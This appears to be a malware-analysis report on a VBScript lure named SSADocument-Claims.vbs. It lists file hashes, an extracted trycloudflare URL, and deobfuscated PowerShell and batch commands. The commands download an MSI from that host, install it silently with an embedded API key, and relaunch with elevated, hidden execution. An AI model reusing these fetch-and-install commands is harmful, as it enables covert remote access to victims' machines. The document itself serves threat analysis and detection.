|
Hash | Hash Value |
|---|---|
| MD5 | 57bf43a3ede5191333449fb491547944
|
| Sha1 | 550486e90482cd3fa37c156b99674dd93c100709
|
| Sha256 | a4c10608db883e2691dd4d2b600e94a6db7f3ebfae2fbc55bb0a5a43febae61b
|
| Sha384 | de2aaf3c58aa9052b637605829f62ac26fb54f3eb937d63f0e8d4b2da12a5325c647a5e6af58016a8494eefbfc9f099d
|
| Sha512 | 5c0e0642946a75ca2f79bff55b5cfa3d7e64a37d6d3bab9feeb1a0b9d6e7dde4904319a09520aa6d06c3897c22b78f72ca2038398dfec35429d60e4610d6b0da
|
| SSDeep | 24:Z79KSoja/RTE1uivQBp3IPJoZ5/vNL3v6oz5DWOJbp7es:nGja/O4iWpYRoZRxBvRhD
|
| TLSH | 8F2123061C0D964C74721397009F8988D5ECC685CD5848E77A9BCCBF54066FC86BC1CA
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | https://blessed-welfare-accessible-explanation.trycloudflare.com/dashboard/bs/bs/sutp.msi |
| Deobfuscated PowerShell | [ServicePointManager]::"SecurityProtocol" = [SecurityProtocolType]::"Tls12" Invoke-WebRequest -Uri "https://blessed-welfare-accessible-explanation.trycloudflare.com/dashboard/bs/bs/sutp.msi" -OutFile "%WORKDIR%\setup.msi" |
| Deobfuscated PowerShell | ""[[Unmanaged(ErrorExpressionAst)] [] net.servicepointmanager]::securityprotocol=[net.securityprotocoltype]::tls12 Invoke-WebRequest -Uri "https://blessed-welfare-accessible-explanation.trycloudflare.com/dashboard/bs/bs/sutp.msi" -OutFile "%WORKDIR%\setup.msi" "" batFile.WriteLine " "echo" "Installing" "setup" "Agent..." "%WORKDIR%\step.log" batFile.WriteLine start" "/wait" "msiexec" "/i" "" "%WORKDIR%\setup.msi" "LEVEL_API_KEY=jGzD3XaLXB4djKMCtnJN8sKk" "/qn" "/log" "" "%WORKDIR%\install.log" batFile.WriteLine echo" "Done" "%WORKDIR%\step.log" batFile.WriteLine exit" "/b" "0 batFile.Close CreateObject(Shell.Application).ShellExecute batPath, ", ", runas, 0" |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | https://blessed-welfare-accessible-explanation.trycloudflare.com/dashboard/bs/bs/sutp.msi |
SSADocument-Claims.vbs |
| Deobfuscated PowerShell | [ServicePointManager]::"SecurityProtocol" = [SecurityProtocolType]::"Tls12" Invoke-WebRequest -Uri "https://blessed-welfare-accessible-explanation.trycloudflare.com/dashboard/bs/bs/sutp.msi" -OutFile "%WORKDIR%\setup.msi" Malicious |
SSADocument-Claims.vbs > SSADocument-Claims.vbs.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | ""[[Unmanaged(ErrorExpressionAst)] [] net.servicepointmanager]::securityprotocol=[net.securityprotocoltype]::tls12 Invoke-WebRequest -Uri "https://blessed-welfare-accessible-explanation.trycloudflare.com/dashboard/bs/bs/sutp.msi" -OutFile "%WORKDIR%\setup.msi" "" batFile.WriteLine " "echo" "Installing" "setup" "Agent..." "%WORKDIR%\step.log" batFile.WriteLine start" "/wait" "msiexec" "/i" "" "%WORKDIR%\setup.msi" "LEVEL_API_KEY=jGzD3XaLXB4djKMCtnJN8sKk" "/qn" "/log" "" "%WORKDIR%\install.log" batFile.WriteLine echo" "Done" "%WORKDIR%\step.log" batFile.WriteLine exit" "/b" "0 batFile.Close CreateObject(Shell.Application).ShellExecute batPath, ", ", runas, 0" Malicious |
SSADocument-Claims.vbs > [PowerShell Command] |